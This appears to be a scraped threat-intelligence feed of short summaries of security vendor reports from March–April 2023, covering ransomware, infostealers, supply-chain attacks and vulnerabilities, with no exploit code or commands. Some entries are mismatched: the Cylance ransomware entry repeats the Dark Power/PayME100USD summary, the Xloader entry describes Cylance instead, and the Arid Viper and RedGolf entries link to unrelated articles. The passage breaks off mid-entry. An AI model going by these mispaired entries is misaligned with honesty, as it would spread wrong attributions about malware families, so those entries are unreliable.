Researchers from SANS have observed that IcedID (Bokbot) is being distributed through thread-hijacked emails with PDF attachments. The PDF files contain links that redirect to Google Firebase Storage URLs hosting password-protected zip archives, and the password for the downloaded archive is shown in the PDF file.
Source: https://isc.sans.edu/diary/rss/29740
2023-04-12
Analyzing_Impala_Stealer
LOW
+
Intel Source:
JFrog
Intel Name:
Analyzing_Impala_Stealer
Date of Scan:
2023-04-12
Impact:
LOW
Summary:
Researchers from JFrog provided a detailed analysis of a malicious payload named “Impala Stealer”, a custom crypto stealer which was used as the payload for the malicious NuGet packages campaign. The sophisticated campaign targeted .NET developers via malicious NuGet packages, and the JFrog Security team was able to detect and report it as part of their regular work exposing supply chain attacks.
Source: https://jfrog.com/blog/impala-stealer-malicious-nuget-package-payload/
2023-04-12
The_discovery_of_three_vulnerabilities_in_the_Microsoft_Message_Queuing_service_MSMQ
HIGH
+
Intel Source:
Checkpoint
Intel Name:
The_discovery_of_three_vulnerabilities_in_the_Microsoft_Message_Queuing_service_MSMQ
Date of Scan:
2023-04-12
Impact:
HIGH
Summary:
Check Point researchers recently observed three new vulnerabilities in the “Microsoft Message Queuing” service, known as MSMQ. These vulnerabilities were disclosed to Microsoft and patched in the April Patch Tuesday update. The most severe of these, dubbed QueueJumper by CPR (CVE-2023-21554), is a critical vulnerability that could allow unauthenticated attackers to remotely execute arbitrary code in the context of the Windows service process mqsvc.exe.
Source: https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/
2023-04-12
The_Analysis_of_Malicious_HTA_File
LOW
+
Intel Source:
ISC.SANS
Intel Name:
The_Analysis_of_Malicious_HTA_File
Date of Scan:
2023-04-12
Impact:
LOW
Summary:
Researchers from SANS have analyzed a malicious HTA file.
Source: https://isc.sans.edu/diary/Another+Malicious+HTA+File+Analysis+Part+2/29676/
2023-04-12
The_Development_and_Refinement_of_DeathNote_Campaign_TTPs
MEDIUM
+
Intel Source:
Securelist
Intel Name:
The_Development_and_Refinement_of_DeathNote_Campaign_TTPs
Date of Scan:
2023-04-12
Impact:
MEDIUM
Summary:
Researchers from Securelist have focused on an active cluster that is dubbed DeathNote because the malware responsible for downloading additional payloads is named Dn.dll or Dn64.dll. This threat is also known as Operation DreamJob or NukeSped.
Source: https://securelist.com/the-lazarus-group-deathnote-campaign/109490/
2023-04-12
The_Attack_Flow_of_RagnarLocker_Ransomware
LOW
+
Intel Source:
Sygnia
Intel Name:
The_Attack_Flow_of_RagnarLocker_Ransomware
Date of Scan:
2023-04-12
Impact:
LOW
Summary:
Researchers from Sygnia have analyzed the attack flow of RagnarLocker ransomware. It is both the name of a ransomware strain and of a criminal group that develops and operates it. Their data leakage blog appeared in April 2020, but although they’re an experienced group, RagnarLocker never made it to the top 10 ransomware strains.
Source: https://blog.sygnia.co/threat-actor-spotlight-ragnarlocker-ransomware
2023-04-12
The_textwrap_wrap_function
LOW
+
Intel Source:
ISC.SANS
Intel Name:
The_textwrap_wrap_function
Date of Scan:
2023-04-12
Impact:
LOW
Summary:
Didier Stevens, SANS ISC senior handler and Microsoft MVP, discovered that the textwrap.wrap function he used in the diary entry "String Obfuscation: Character Pair Reversal" does not always group characters as he expected. He released an update of his python-per-line.py tool, including a Reverse function, as well as some simple brute-forcing.
Source: https://isc.sans.edu/diary/Extra+String+Obfuscation+Character+Pair+Reversal/29656
2023-04-12
Malicious_Document_From_Ukraines_Energoatom_Delivering_Havoc_Demon_Backdoor
LOW
+
Intel Source:
Fortinet
Intel Name:
Malicious_Document_From_Ukraines_Energoatom_Delivering_Havoc_Demon_Backdoor
Date of Scan:
2023-04-12
Impact:
LOW
Summary:
FortiGuard Labs researchers have identified a malicious spoofed document pretending to be from the Ukrainian company, Energoatom, a state-owned enterprise that operates Ukraine’s nuclear power plants.
Source: https://www.fortinet.com/blog/threat-research/malware-disguised-as-document-ukraine-energoatom-delivers-havoc-demon-backdoor?&web_view=true
2023-04-11
The_CryptoClippy_malware_campaign_targets_Portuguese_speakers
LOW
Intel Source:
PaloAlto
Intel Name:
The_CryptoClippy_malware_campaign_targets_Portuguese_speakers
Date of Scan:
2023-04-11
Impact:
LOW
Summary:
Unit 42 recently observed a malware campaign targeting Portuguese speakers that redirects cryptocurrency from legitimate users’ wallets to wallets controlled by threat actors. The campaign uses a malware known as a cryptocurrency clipper, which monitors the victim’s clipboard for signs that a cryptocurrency wallet address is being copied.
Source: https://unit42.paloaltonetworks.com/crypto-clipper-targets-portuguese-speakers/
2023-04-11
Hackers_Flooding_NPM_With_Fake_Packages_Causing_DoS_Attack
LOW
Intel Source:
Checkmarx
Intel Name:
Hackers_Flooding_NPM_With_Fake_Packages_Causing_DoS_Attack
Date of Scan:
2023-04-11
Impact:
LOW
Summary:
Researchers from Checkmarx Security have identified that hackers are flooding the npm open source package repository for Node.js with bogus packages, which briefly even resulted in a denial-of-service (DoS) attack.
Source: https://medium.com/checkmarx-security/who-broke-npm-malicious-packages-flood-leading-to-denial-of-service-77ac707ddbf1
2023-04-11
Gopuram_backdoor_deployed_through_3CX_supply_chain_attack
MEDIUM
Intel Source:
Securelist
Intel Name:
Gopuram_backdoor_deployed_through_3CX_supply_chain_attack
Date of Scan:
2023-04-11
Impact:
MEDIUM
Summary:
On March 29, Crowdstrike posted their report about a supply chain attack conducted via 3CXDesktopApp. Securelist researchers analyzed the attack and shared their findings. They had observed few victims compromised with Gopuram, but the number of infections began to increase in March 2023. As it turned out, the increase was directly related to the 3CX supply chain attack.
Source: https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/
2023-04-11
ASEC_Weekly_Phishing_Email_analyses_March_26_April_1_2023
LOW
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Phishing_Email_analyses_March_26_April_1_2023
Date of Scan:
2023-04-11
Impact:
LOW
Summary:
ASEC lab researchers continuously monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from March 26th, 2023 to April 1st, 2023 and provides statistical information on each type.
Source: https://asec.ahnlab.com/en/51222/
2023-04-11
A_new_strain_of_malware_Rilide_targets_Chromium_based_browsers
LOW
Intel Source:
Trustwave
Intel Name:
A_new_strain_of_malware_Rilide_targets_Chromium_based_browsers
Date of Scan:
2023-04-11
Impact:
LOW
Summary:
Trustwave SpiderLabs observed a new strain of malware named Rilide that targets Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, and Opera. Rilide poses as a legitimate Google Drive extension and lets threat actors carry out a wide range of malicious activities, including monitoring browsing history, taking screenshots, and injecting malicious scripts to withdraw funds from various cryptocurrency exchanges.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rilide-a-new-malicious-browser-extension-for-stealing-cryptocurrencies/
2023-04-11
The_Deep_Analysis_Report_on_SarinLocker_Ransomware
LOW
Intel Source:
Cyfirma
Intel Name:
The_Deep_Analysis_Report_on_SarinLocker_Ransomware
Date of Scan:
2023-04-11
Impact:
LOW
Summary:
Cyfirma researchers have deeply analyzed a new ransomware called SarinLocker. The group has started a ransomware affiliate program that provides attackers with ransomware and affiliate software to manage victims.
Source: https://www.cyfirma.com/outofband/sarinlocker-ransomware/
2023-04-10
ASEC_Weekly_Phishing_Email_analyses_March_19_25th_2023
LOW
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Phishing_Email_analyses_March_19_25th_2023
Date of Scan:
2023-04-10
Impact:
LOW
Summary:
ASEC lab researchers continuously monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from March 19th, 2023 to March 25th, 2023 and provides statistical information on each type.
Source: https://asec.ahnlab.com/en/50789/
2023-04-10
Ransomware_Based_Attacks_Carried_Out_by_Iranian_Hackers
MEDIUM
Intel Source:
Microsoft
Intel Name:
Ransomware_Based_Attacks_Carried_Out_by_Iranian_Hackers
Date of Scan:
2023-04-10
Impact:
MEDIUM
Summary:
Microsoft researchers have observed the Iranian nation-state group known as MuddyWater carrying out destructive attacks on hybrid environments under the guise of a ransomware operation.
Source: https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/
2023-04-10
New_Ransomware_Group_Named_Money_Message
LOW
Intel Source:
Cyble
Intel Name:
New_Ransomware_Group_Named_Money_Message
Date of Scan:
2023-04-10
Impact:
LOW
Summary:
Cyble researchers have discovered a new ransomware group named Money Message. It can encrypt network shares and targets both Windows and Linux operating systems.
Source: https://blog.cyble.com/2023/04/06/demystifying-money-message-ransomware/
2023-04-10
WordPress_Infection_Campaign_Leveraging_Recently_Discovered_Theme_and_Plugin_Vulnerabilities
LOW
Intel Source:
Sucuri
Intel Name:
WordPress_Infection_Campaign_Leveraging_Recently_Discovered_Theme_and_Plugin_Vulnerabilities
Date of Scan:
2023-04-10
Impact:
LOW
Summary:
Researchers from Sucuri have tracked a massive WordPress infection campaign since 2017. They typically refer to it as an ongoing, long-lasting, massive WordPress infection campaign that leverages all known and recently discovered theme and plugin vulnerabilities.
Source: https://blog.sucuri.net/2023/04/balada-injector-synopsis-of-a-massive-ongoing-wordpress-malware-campaign.html?web_view=true
2023-04-06
Emotet_Resumed_its_Spamming_Activities
LOW
Intel Source:
Trustwave
Intel Name:
Emotet_Resumed_its_Spamming_Activities
Date of Scan:
2023-04-06
Impact:
LOW
Summary:
Researchers from Trustwave SpiderLabs have seen Emotet switch focus to using OneNote attachments, a tactic also adopted by other malware groups in recent months. The analysis is intended to help the cybersecurity community better understand the wider obfuscation and padding tricks Emotet is using.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/deobfuscating-the-recent-emotet-epoch-4-macro/
2023-04-06
The_functions_of_Genesis_Market
LOW
Intel Source:
Trellix
Intel Name:
The_functions_of_Genesis_Market
Date of Scan:
2023-04-06
Impact:
LOW
Summary:
Trellix was approached by law enforcement asking for assistance with the analysis of Genesis Market. Trellix has analyzed and explained the functions and operations of Genesis Market, and has also provided an analysis of malware samples that law enforcement shared with Trellix, along with advice and guidance for (potential) victims.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/genesis-market-no-longer-feeds-the-evil-cookie-monster.html
2023-04-06
ASEC_Weekly_Malware_statistics_March_27_April_2_2023
LOW
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Malware_statistics_March_27_April_2_2023
Date of Scan:
2023-04-06
Impact:
LOW
Summary:
ASEC lab researchers continuously monitor malware threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post lists weekly statistics collected from March 27th, 2023 (Monday) to April 2nd, 2023 (Sunday).
Source: https://asec.ahnlab.com/en/50952/
2023-04-06
The_efile_com_analyses
LOW
Intel Source:
ISC SANS
Intel Name:
The_efile_com_analyses
Date of Scan:
2023-04-06
Impact:
LOW
Summary:
Johannes B. Ullrich, Ph.D., Dean of Research at SANS.edu, analyzed the efile.com malware "efail", which was serving malicious fake "Browser Updates" to some of the site's users. Johannes B. Ullrich was able to retrieve some of the malware the previous evening, before it was removed. The attack uses two main executables. The first one, "update.exe," is a simple downloader that downloads and executes the second part. The second part is a PHP script communicating with the command and control server; its main function is to download and execute additional code as instructed. During installation, basic system information is sent to the attacker, and the backdoor is made persistent via scheduled/on-boot registry entries.
Source: https://isc.sans.edu/diary/Analyzing+the+efilecom+Malware+efail/29712/#comments
2023-04-06
Royal_Ransom_analyses
LOW
Intel Source:
Trellix
Intel Name:
Royal_Ransom_analyses
Date of Scan:
2023-04-06
Impact:
LOW
Summary:
The Trellix Advanced Cyber Services team within Trellix Professional Services provided updated incident response-related data on Royal Ransom.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/a-royal-analysis-of-royal-ransom.html
2023-04-05
Typhon_Reborn_Stealer_Malware_Back_with_Advanced_Evasion_Techniques
LOW
Intel Source:
Talos
Intel Name:
Typhon_Reborn_Stealer_Malware_Back_with_Advanced_Evasion_Techniques
Date of Scan:
2023-04-05
Impact:
LOW
Summary:
Talos researchers have observed that the threat actor behind the information-stealing malware known as Typhon Reborn has resurfaced with an updated version (V2) that packs in improved capabilities to evade detection and resist analysis.
Source: https://blog.talosintelligence.com/typhon-reborn-v2-features-enhanced-anti-analysis/
2023-04-05
Proxyjacking_Scheme_Exploits_Log4j_Bug_to_Profit_From_Victim_IP_Addresses
LOW
Intel Source:
Sysdig
Intel Name:
Proxyjacking_Scheme_Exploits_Log4j_Bug_to_Profit_From_Victim_IP_Addresses
Date of Scan:
2023-04-05
Impact:
LOW
Summary:
Researchers from Sysdig have detected a new attack, dubbed proxyjacking, that leveraged the Log4j vulnerability for initial access. The attacker then sold the victim’s IP addresses to proxyware services for profit.
Source: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
2023-04-05
Disney_Phishing_Scams
LOW
Intel Source:
Cyber War Zone
Intel Name:
Disney_Phishing_Scams
Date of Scan:
2023-04-05
Impact:
LOW
Summary:
Researchers from Cyber War Zone have identified the latest Disney-related phishing scams in 2023 and provide tips to avoid falling victim to these scams.
Source: https://cyberwarzone.com/beware-of-disney-phishing-scams-in-2023/?web_view=true
2023-04-05
New_Ransomware_Variants_Are_Dark_Power_and_PayME100USD
LOW
Intel Source:
Fortinet
Intel Name:
New_Ransomware_Variants_Are_Dark_Power_and_PayME100USD
Date of Scan:
2023-04-05
Impact:
LOW
Summary:
FortiGuard Labs researchers have identified two new ransomware families named Dark Power and PayME100USD. Dark Power ransomware launched in early February 2023 and is a rare ransomware breed in that it was written in the Nim programming language. PayMe100USD, a ransomware written in Python, was discovered in March 2023; the malware has basic functionality and performs ordinary ransomware activities.
Source: https://www.fortinet.com/blog/threat-research/dark-power-and-payme100usd-ransomware?&web_view=true
2023-04-05
An_Attack_Against_Palestinian_Targets_Using_New_Weapons
LOW
Intel Source:
Symantec
Intel Name:
An_Attack_Against_Palestinian_Targets_Using_New_Weapons
Date of Scan:
2023-04-05
Impact:
LOW
Summary:
Researchers from Symantec have observed that the Mantis APT group (aka Arid Viper, Desert Falcon, APT-C-23), a threat actor believed to be operating out of the Palestinian territories, is continuing to mount attacks, deploying a refreshed toolset and going to great lengths to maintain a persistent presence on targeted networks.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks
2023-04-05
Chinese_Hacking_Group_RedGolf_Targeting_Windows_and_Linux_Systems
MEDIUM
Intel Source:
Mandiant
Intel Name:
Chinese_Hacking_Group_RedGolf_Targeting_Windows_and_Linux_Systems
Date of Scan:
2023-04-05
Impact:
MEDIUM
Summary:
Mandiant researchers have identified a Chinese state-sponsored threat activity group tracked as RedGolf, which has been attributed with the use of a custom Windows and Linux backdoor called KEYPLUG.
Source: https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation
2023-04-05
New_Ransomware_Rorschach_Targeting_US_Based_Company
MEDIUM
Intel Source:
Checkpoint
Intel Name:
New_Ransomware_Rorschach_Targeting_US_Based_Company
Date of Scan:
2023-04-05
Impact:
MEDIUM
Summary:
Checkpoint researchers have analyzed the Rorschach ransomware and revealed the emergence of a new ransomware strain in the crimeware landscape. Its developers implemented new anti-analysis and defense evasion techniques to avoid detection and make it more difficult for security software and researchers to analyze and mitigate its effects.
Source: https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/
2023-04-05
Arid_Viper_Hacking_Group_Using_Upgraded_Malware
LOW
Intel Source:
Symantec
Intel Name:
Arid_Viper_Hacking_Group_Using_Upgraded_Malware
Date of Scan:
2023-04-05
Impact:
LOW
Summary:
Researchers from Symantec have observed the threat actor known as Arid Viper using refreshed variants of its malware toolkit in attacks targeting Palestinian entities since September 2022.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord
2023-04-05
ALPHV_Ransomware_Affiliate_Targeting_Vulnerable_Backup_Installations_to_Gain_Initial_Access
MEDIUM
Intel Source:
Mandiant
Intel Name:
ALPHV_Ransomware_Affiliate_Targeting_Vulnerable_Backup_Installations_to_Gain_Initial_Access
Date of Scan:
2023-04-05
Impact:
MEDIUM
Summary:
Mandiant researchers have observed a new ALPHV (aka BlackCat) ransomware affiliate, tracked as UNC4466, targeting publicly exposed Veritas Backup Exec installations vulnerable to CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878 for initial access to victim environments.
Source: https://www.mandiant.com/resources/blog/alphv-ransomware-backup
2023-04-04
New_European_APT_Group_Named_FusionCore
LOW
Intel Source:
Cyfirma
Intel Name:
New_European_APT_Group_Named_FusionCore
Date of Scan:
2023-04-04
Impact:
LOW
Summary:
Cyfirma researchers have identified a new European threat actor group known as FusionCore that is running a Malware-as-a-Service operation alongside a hacker-for-hire operation. They offer a wide variety of tools and services on their website, making it a one-stop shop for threat actors looking to purchase cost-effective yet customizable malware.
Source: https://www.cyfirma.com/outofband/the-rise-of-fusioncore-an-emerging-cybercrime-group-from-europe/
2023-04-04
Analyzing_Rhadamanthys_infostealer
LOW
Intel Source:
Checkpoint
Intel Name:
Analyzing_Rhadamanthys_infostealer
Date of Scan:
2023-04-04
Impact:
LOW
Summary:
Checkpoint researchers provided the highlights of the Dark Web ‘buzz’ surrounding this malware. They shared insights which confirm that, by the nature of how the malware is used, large organizations are also being subjected to incidental drive-by attacks that have a theoretical potential to escalate. Rhadamanthys is an advanced infostealer which debuted on the dark web in September of last year to a warm critical reception by cybercriminals.
Source: https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/
2023-04-04
The_distribution_of_Nevada_Ransomware_in_Korea
LOW
Intel Source:
ASEC
Intel Name:
The_distribution_of_Nevada_Ransomware_in_Korea
Date of Scan:
2023-04-04
Impact:
LOW
Summary:
ASEC has identified new cases of the Nevada ransomware during internal monitoring. Nevada's defining trait is that it adds the “.NEVADA” extension to the files it infects. After encrypting directories, it creates ransom notes with the filename “README.txt” in every directory. These notes contain a Tor browser link for ransom payments.
Source: https://asec.ahnlab.com/en/50063/
2023-04-04
IRS_Authorized_Tax_Return_Filing_Software_Caught_Serving_JS_Malware
LOW
Intel Source:
MalwareHunter, ISC.SANS
Intel Name:
IRS_Authorized_Tax_Return_Filing_Software_Caught_Serving_JS_Malware
Date of Scan:
2023-04-04
Impact:
LOW
Summary:
Researchers from MalwareHunter have observed a malicious JavaScript file that was present on the eFile[.]com website for weeks. eFile.com is an IRS-authorized e-file software service provider used by many for filing their tax returns, and it has been caught serving JavaScript malware.
Source: https://twitter.com/malwrhunterteam/status/1642988428080865281 https://isc.sans.edu/diary/Supply+Chain+Compromise+or+False+Positive+The+Intriguing+Case+of+efilecom+updated+confirmed+malicious+code/29708/
2023-04-04
The_Malware_Sample_Analysis_of_Cl0p_Ransomware
LOW
Intel Source:
Cyble
Intel Name:
The_Malware_Sample_Analysis_of_Cl0p_Ransomware
Date of Scan:
2023-04-04
Impact:
LOW
Summary:
Cyble researchers have analyzed Cl0p ransomware samples; the analyzed malware is an executable file with a Graphical User Interface (GUI), compiled using Microsoft Visual C/C++.
Source: https://blog.cyble.com/2023/04/03/cl0p-ransomware-active-threat-plaguing-businesses-worldwide/
2023-04-04
Vulnerability_in_WordPress_Elementor_Pro_Patched
LOW
Intel Source:
Sucuri
Intel Name:
Vulnerability_in_WordPress_Elementor_Pro_Patched
Date of Scan:
2023-04-04
Impact:
LOW
Summary:
Researchers from Sucuri have analyzed the WordPress Elementor Pro vulnerability that allows authenticated users to arbitrarily change wp_options values within the database via the AJAX action of Elementor Pro working in conjunction with WooCommerce.
Source: https://blog.sucuri.net/2023/03/high-severity-vulnerability-in-wordpress-elementor-pro-patched.html
2023-04-03
ICS_compromised_Due_to_Installition_of_Unlicensed_Microsoft_Office
MEDIUM
Intel Source:
CERT-UA
Intel Name:
ICS_compromised_Due_to_Installition_of_Unlicensed_Microsoft_Office
Date of Scan:
2023-04-03
Impact:
MEDIUM
Summary:
CERT-UA researchers have identified unauthorized access to the information and communication system (ICS) of one of the utility companies. It is observed that the primary compromise of the computer took place on 19.01.2023 as a result of the installation of an unlicensed version of the software product Microsoft Office 2019.
Source: https://cert.gov.ua/article/4279195
2023-04-03
Money_Message_Ransomware_Targeting_Worldwide
LOW
Intel Source:
ZScaler
Intel Name:
Money_Message_Ransomware_Targeting_Worldwide
Date of Scan:
2023-04-03
Impact:
LOW
Summary:
Researchers from Zscaler have identified a new ransomware gang named 'Money Message' that is targeting victims worldwide and demanding million-dollar ransoms in exchange for not leaking data and for releasing a decryptor.
Source: https://twitter.com/Threatlabz/status/1641113991824158720
2023-04-03
MalSpam_Delivering_Malicious_ISO
LOW
Intel Source:
DFIR Report
Intel Name:
MalSpam_Delivering_Malicious_ISO
Date of Scan:
2023-04-03
Impact:
LOW
Summary:
The DFIR Report researchers have observed that IcedID continues to use malspam emails to facilitate a compromise; their report covers activity from a campaign in late September 2022. The post-exploitation activities detail some familiar and some new techniques and tooling, which led to domain-wide ransomware.
Source: https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/
2023-04-03
New_Cylance_Ransomware_Targeting_Linux_and_Windows
LOW
Intel Source:
Fortinet
Intel Name:
New_Cylance_Ransomware_Targeting_Linux_and_Windows
Date of Scan:
2023-04-03
Impact:
LOW
Summary:
FortiGuard Labs researchers have identified two new ransomware families named Dark Power and PayME100USD. Dark Power ransomware launched in early February 2023 and is a rare ransomware breed in that it was written in the Nim programming language. PayMe100USD, a ransomware written in Python, was discovered in March 2023; the malware has basic functionality and performs ordinary ransomware activities.
Source: https://www.fortinet.com/blog/threat-research/dark-power-and-payme100usd-ransomware?&web_view=true
2023-04-03
New_Variant_of_Xloader_Malware
MEDIUM
Intel Source:
PaloAlto
Intel Name:
New_Variant_of_Xloader_Malware
Date of Scan:
2023-04-03
Impact:
MEDIUM
Summary:
Researchers from PaloAlto have discovered a new ransomware named Cylance Ransomware which is targeting Windows and Linux systems.
Source: https://twitter.com/Unit42_Intel/status/1641588431221342208
2023-04-01
Emotet_Distributing_via_OneNote
LOW
Intel Source:
ASEC
Intel Name:
Emotet_Distributing_via_OneNote
Date of Scan:
2023-04-01
Impact:
LOW
Summary:
Researchers from ASEC have discovered Emotet being distributed via OneNote. A spear-phishing email with an attached OneNote file prompts the reader to open the attachment, which contains a malicious script file (JS file).
Source: https://asec.ahnlab.com/en/50564/
2023-04-01
Analyzing_CHM_Malware_Using_EDR
LOW
Intel Source:
ASEC
Intel Name:
Analyzing_CHM_Malware_Using_EDR
Date of Scan:
2023-04-01
Impact:
LOW
Summary:
ASEC researchers have identified an APT attack case that has recently used CHM (Compiled HTML Help) files. Threat actors can embed malicious script code in the HTML files included in a CHM, and the inserted script is executed through hh.exe, a default OS application.
Source: https://asec.ahnlab.com/en/50580/
2023-04-01
New_Infostealer_LummaC2_Distributing_Under_the_Mask_of_Illegal_Cracks
LOW
Intel Source:
ASEC
Intel Name:
New_Infostealer_LummaC2_Distributing_Under_the_Mask_of_Illegal_Cracks
Date of Scan:
2023-04-01
Impact:
LOW
Summary:
ASEC researchers have identified a new infostealer called LummaC2 that is being distributed disguised as illegal programs such as cracks and keygens.
Source: https://asec.ahnlab.com/en/50594/
2023-04-01
The_Deep_Examination_of_Royal_Ransomware
LOW
Intel Source:
Quickheal
Intel Name:
The_Deep_Examination_of_Royal_Ransomware
Date of Scan:
2023-04-01
Impact:
LOW
Summary:
QuickHeal researchers have deeply analyzed the Royal Ransomware. It was first observed in mid-2022 and it is a type of ransomware that encrypts all volumes including network shared drives.
Source: https://blogs.quickheal.com/deep-dive-into-royal-ransomware/
2023-04-01
The_Detection_and_Defense_Technique_of_AsyncRAT
LOW
Intel Source:
Splunk
Intel Name:
The_Detection_and_Defense_Technique_of_AsyncRAT
Date of Scan:
2023-04-01
Impact:
LOW
Summary:
Splunk researchers have analyzed AsyncRAT and provided detection and defense techniques. AsyncRAT is a popular commodity malware tool, and threat actors and adversaries use several interesting script loaders and spear phishing attachments to deliver it to targeted hosts or networks in different campaigns.
Source: https://www.splunk.com/en_us/blog/security/asyncrat-crusade-detections-and-defense.html
2023-04-01
New_OpcJacker_Malware_Distributing_via_Fake_VPN_Malvertising
LOW
Intel Source:
TrendMicro
Intel Name:
New_OpcJacker_Malware_Distributing_via_Fake_VPN_Malvertising
Date of Scan:
2023-04-01
Impact:
LOW
Summary:
TrendMicro researchers have discovered a new malware, which they named OpcJacker, that has been distributed in the wild since the second half of 2022. Its main functions include keylogging, taking screenshots, stealing sensitive data from browsers, loading additional modules, and replacing cryptocurrency addresses in the clipboard for hijacking purposes.
Source: https://www.trendmicro.com/en_us/research/23/c/new-opcjacker-malware-distributed-via-fake-vpn-malvertising.html
2023-03-31
New_TACTICAL_OCTOPUS_Attack_Campaign_Targeting_US_Entities
MEDIUM
Intel Source:
Securonix Threat Labs
Intel Name:
New_TACTICAL_OCTOPUS_Attack_Campaign_Targeting_US_Entities
Date of Scan:
2023-03-31
Impact:
MEDIUM
Summary:
Securonix Threat Labs researchers have observed that threat actors are ramping up tax-related phishing scams to US-based victims to infect systems with stealthy malware.
Source: https://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/
2023-03-31
Defensive_Considerations_for_Lazarus_FudModule
LOW
Intel Source:
Security Intelligence
Intel Name:
Defensive_Considerations_for_Lazarus_FudModule
Date of Scan:
2023-03-31
Impact:
LOW
Summary:
Security Intelligence analysts posted a blog focusing on detection capabilities for the FudModule within the Lazarus sample analyzed by X-Force, as well as a summary of a strategy that uses telemetry stream health as a way of detecting malware designed to impair defenses through ETW tampering.
Source: https://securityintelligence.com/posts/defensive-considerations-lazarus-fudmodule/?c=Threat%20Research
2023-03-31
ASEC_Weekly_Phishing_Email_sample_analyses_Mar_4th_to_11th_2023
LOW
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Phishing_Email_sample_analyses_Mar_4th_to_11th_2023
Date of Scan:
2023-03-31
Impact:
LOW
Summary:
ASEC lab researchers continuously monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from March 5th, 2023 to March 11th, 2023 and provides statistical information on each type.
Source: https://asec.ahnlab.com/en/49839/
2023-03-31
ASEC_Weekly_Malware_statistics_March_13_19th_2023
LOW
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Malware_statistics_March_13_19th_2023
Date of Scan:
2023-03-31
Impact:
LOW
Summary:
The ASEC analysis team used the ASEC automatic analysis system RAPIT to categorize and respond to known malware. Their post covers weekly statistics collected from March 13th, 2023 to March 19th, 2023.
Source: https://asec.ahnlab.com/en/50173/
2023-03-31
Hackers_Spreading_ShellBot_and_Moobot_Malware_on_Exploitable_Servers
MEDIUM
Intel Source:
Fortinet
Intel Name:
Hackers_Spreading_ShellBot_and_Moobot_Malware_on_Exploitable_Servers
Date of Scan:
2023-03-31
Impact:
MEDIUM
Summary:
Researchers from FortiGuard Labs have observed several attacking bursts targeting Cacti and Realtek vulnerabilities in January and March of this year and then spreading ShellBot and Moobot malware.
Source: https://www.fortinet.com/blog/threat-research/moobot-strikes-again-targeting-cacti-and-realtek-vulnerabilities?&web_view=true
2023-03-31
New_APT_Group_TA473_Exploiting_Zimbra_Vulnerability
MEDIUM
Intel Source:
Proofpoint
Intel Name:
New_APT_Group_TA473_Exploiting_Zimbra_Vulnerability
Date of Scan:
2023-03-31
Impact:
MEDIUM
Summary:
Researchers from Proofpoint have observed a newly minted advanced persistent threat actor named TA473, exploiting Zimbra vulnerability CVE-2022-27926 to abuse publicly facing Zimbra hosted webmail portals. The goal of this activity is assessed to be gaining access to the emails of military, government, and diplomatic organizations across Europe involved in the Russia-Ukrainian War.
Source: https://www.proofpoint.com/us/blog/threat-insight/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability
2023-03-30
The_distribution_of_a_OneNote_malware_by_Kimsuky
LOW
Intel Source:
ASEC
Intel Name:
The_distribution_of_a_OneNote_malware_by_Kimsuky
Date of Scan:
2023-03-30
Impact:
LOW
Summary:
ASEC has observed the distribution of a OneNote malware mimicking a form linked to compensation. The confirmed file impersonates the same research center as the LNK-type malware mentioned earlier. Based on the identical malicious activity performed by the VBS files, the team concluded that the same actor, the Kimsuky group, is behind both incidents.
Source: https://asec.ahnlab.com/en/50303/
2023-03-30
AlienFox_Toolkit_Stealing_Cloud_Service_Credentials
HIGH
Intel Source:
Sentinelone
Intel Name:
AlienFox_Toolkit_Stealing_Cloud_Service_Credentials
Date of Scan:
2023-03-30
Impact:
HIGH
Summary:
SentinelOne researchers have identified a new modular toolkit called AlienFox which allows threat actors to scan for misconfigured servers to steal authentication secrets and credentials for cloud-based email services.
Source: https://assets.sentinelone.com/sentinellabs22/s1_-sentinellabs_dis#page=1
2023-03-30
Supply_Chain_Attack_on_3CX_Desktop_Apps_Threatens_Millions_at_Risk
MEDIUM
Intel Source:
Sentinelone
Intel Name:
Supply_Chain_Attack_on_3CX_Desktop_Apps_Threatens_Millions_at_Risk
Date of Scan:
2023-03-30
Impact:
MEDIUM
Summary:
Researchers from SentinelOne have identified that the trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls ICO files appended with Base64 data from GitHub and ultimately leads to a third-stage info stealer DLL.
Source: https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/
2023-03-30
ChinaZ_DDoS_Bot_malware_distribution
MEDIUM
Intel Source:
ASEC
Intel Name:
ChinaZ_DDoS_Bot_malware_distribution
Date of Scan:
2023-03-30
Impact:
MEDIUM
Summary:
